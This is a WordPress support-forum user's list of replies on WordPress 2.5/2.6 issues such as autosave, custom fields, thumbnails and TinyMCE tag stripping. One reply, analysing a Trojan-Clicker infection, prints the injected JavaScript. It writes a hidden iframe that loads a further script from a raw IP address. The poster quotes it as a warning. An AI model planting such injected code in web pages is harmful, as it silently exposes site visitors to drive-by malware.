arminbw
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: how do I shut off auto-save in the admin panel ?Auto-saving is annoying.
I guess I will set the AUTOSAVE_INTERVAL in wp-settings.php to a higher value, knowing that this is not a clear solution.
Does Exper´s plugin work only for 2.6, or older versions (e.g. 2.5.1) too?
Forum: Alpha/Beta/RC
In reply to: Custom Fields problem with 2.5rc2Looking at posts in this forum, WP 2.6 brings a bunch of new bugs. They might be fixed in the next version, but I am thinking about staying at version 2.5.1 and fixing the bugs I already know.
Unfortunately ticket 6457 doesn’t give any hint on how the problems with the custom fields were actually solved. How many files had to be altered and which?
If SafeMode is turned on, you will propably have to do this every month. Check: image upload problem – parent directory writeable
Forum: Fixing WordPress
In reply to: ordered custom fields, ordered metaI found this “closed discussion” in the WP-Advanced Forum: Custom fields not in alphabetical order.
And there is a plugin under constant development called “More Fields” which actually allows reordering the custom fields. Unfortunately it can only be used by admins with full access to the backend.
Any tipps?
Forum: Alpha/Beta/RC
In reply to: Custom Fields problem with 2.5rc2milestone changed from 2.5.2 to 2.9.
Ouch.
Forum: Fixing WordPress
In reply to: Listing sub-categories and descriptions automaticallyCheck “Settings/Reading/Blog pages show at most” in your admin backend. Ouch…
Forum: Alpha/Beta/RC
In reply to: Custom Fields problem with 2.5rc2I would be nice if deactivating the annoying autosave function would be possible. Manually deleting all those drafts is quite a tedious task.
Unfortunately deleting wp_enqueue_script(‘autosave’) in post-new.php isn’t a solution regarding the custom field issues.
At least ticket 6457 is set to priority “highest omg bbq”..
Forum: Alpha/Beta/RC
In reply to: Custom Fields problem with 2.5rc2I would be nice if deactivating the annoying autosave function would be possible. Manually deleting all those drafts is quite a tedious task.
Unfortunately deleting wp_enqueue_script(‘autosave’) in post-new.php isn’t a solution regarding the custom field issues.
At least ticket 6457 is set to priority “highest omg bbq”..
Forum: Fixing WordPress
In reply to: Paragraph tag dissappearing upon save or code view changeApart from Safari related issues…
There are WordPress filters, some of the activated in wp-includes/default-filters.php, and some of them used on other places.
And as far as I know TinyMce can do it´s own filtering too, which would cause the deletion of tags while flipping between the WYSIWYG and HTML-code views. Checkout wp-includes/js/tinymce/tiny_mce_config.php.And finally, another source for all the troubles could be the theme. The function “get_the_content” for example will strip paragraphs away. If paragraphs turn up correctly while using the default theme this could be the source of all troubles.
G,
ArminForum: Fixing WordPress
In reply to: Thumbnails not generated in v2.5If thumbnails have been created but instead full-size show up on certain places, this could be related to their EXIF data.
See: http://trac.wordpress.org/ticket/7278If some images in the upload folder do not have thumbnail versions, it might be related to their “mode”, which should be RGB and not CMYK or greyscale.
See: http://trac.wordpress.org/ticket/7039G,
ArminForum: Fixing WordPress
In reply to: Thumbnails not generated in v2.5I do have the same problem.
Some thumbnails get generated, others not.
I will stick around in the source code a bit.Forum: Plugins
In reply to: Pull latest attachment from post?Just to send out a warning: If the EXIF data of an image contains special characters, certain functions in WordPress 2.5.1 will only return the URL of the full size image.
See: ticket 7278Forum: Fixing WordPress
In reply to: 2.5 How to create a category template for a gallery ?<?php $attachments = get_children(array('post_parent' => get_the_ID(), 'post_type' => 'attachment', 'post_mime_type' => 'image', 'orderby' => 'menu_order'));One question regarding Matt´s code cited by filosofo: What is menu_order supposed to be? It´s always set to zero. Or is there some way to give the images different values by using the WordPress admin backend?
thnx,
arminbwForum: Fixing WordPress
In reply to: WordPress 2.5.1 and Trojan-Clicker.JS.Agent.h virus problemWhat the java-script is actual doing is the following:
var d=document; if(!myia) { d.write(' <IFRAME name=O1 src=\'http://77.221.133.171/.if/go.html?'+Math.round(Math.random()*152847)+'8102f33b7\' width=629 height=243 style=\'display: none\'>'); } var myia=true;This (russian?) server will give you another (more complicated) script, which purpose is not clear to me right now. Do not visit this site and do not run this java script!
Forum: Fixing WordPress
In reply to: image upload problem – parent directory writeableThis has absolutely nothing related with the SafeMode or any permissions CHMOD.
Well, the world is full of errors. In this post I addressed the “parent directory writeable by server” problem, not any http issues. Try a search is in this forum (read this), use the no-flash-uploader. Good luck!